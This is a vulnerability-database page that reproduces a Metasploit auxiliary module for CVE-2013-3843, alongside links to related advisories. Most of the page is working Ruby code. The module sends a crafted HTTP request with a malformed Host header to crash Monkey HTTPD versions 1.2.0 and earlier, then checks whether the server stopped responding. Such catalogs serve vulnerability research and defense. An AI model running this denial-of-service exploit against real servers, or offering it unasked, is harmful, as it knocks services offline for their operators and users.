Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Monkey HTTPD Header Parsing Denial of Service (DoS)

🗓️ 13 Jun 2013 20:56:34Reported by Doug Prostko <[email protected]>Type 
metasploit
 metasploit🔗 www.rapid7.com👁 32 Views

Monkey HTTPD Header Parsing Do

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2013-3843
13 Jun 201414:55
attackerkb
Circl		CVE-2013-3843
29 May 201815:50
circl
Check Point Advisories		Monkey HTTPD Header Parsing Denial of Service (CVE-2013-3843)
1 Sep 201300:00
checkpoint_advisories
CVE		CVE-2013-3843
13 Jun 201414:00
cve
Cvelist		CVE-2013-3843
13 Jun 201414:00
cvelist
Tenable Nessus		GLSA-201309-17 : Monkey HTTP Daemon: Multiple vulnerabilities
26 Sep 201300:00
nessus
Gentoo Linux		Monkey HTTP Daemon: Multiple vulnerabilities
25 Sep 201300:00
gentoo
NVD		CVE-2013-3843
13 Jun 201414:55
nvd
OpenVAS		Gentoo Security Advisory GLSA 201309-17
29 Sep 201500:00
openvas
OpenVAS		Monkey HTTP Server <= 1.2.0 Host Header Buffer Overflow Vulnerability
5 Jun 201300:00
openvas
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Monkey HTTPD Header Parsing Denial of Service (DoS)',
      'Description'    => %q{
          This module causes improper header parsing that leads to a segmentation fault
        due to a specially crafted HTTP request. Affects version <= 1.2.0.
      },
      'Author'         =>
        [
          'Doug Prostko <dougtko[at]gmail.com>'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-3843'],
          ['OSVDB', '93853'],
          ['BID', '60333']
        ],
      'DisclosureDate' => '2013-05-30'))

    register_options(
      [
        Opt::RPORT(2001)
      ])
  end

  def dos
    req = "GET / HTTP/1.1\r\n"
    req << "Host:\r\n\r\nlocalhost\r\n"
    req << "User-Agent:\r\n\r\n"

    connect
    sock.put(req)
    disconnect
  end

  def is_alive?
    begin
      connect
    rescue Rex::ConnectionRefused
      return false
    ensure
      disconnect
    end

    true
  end

  def run
    print_status("#{rhost}:#{rport} - Sending DoS packet...")
    dos

    print_status("#{rhost}:#{rport} - Checking server status...")
    select(nil, nil, nil, 1)

    if is_alive?
      print_error("#{rhost}:#{rport} - Server is still alive")
    else
      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Oct 2020 20:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 26.8
EPSS0.20179
httpdenial of servicesegmentation faultvulnerabilitycve-2013-3843osvdb-93853bid-60333
32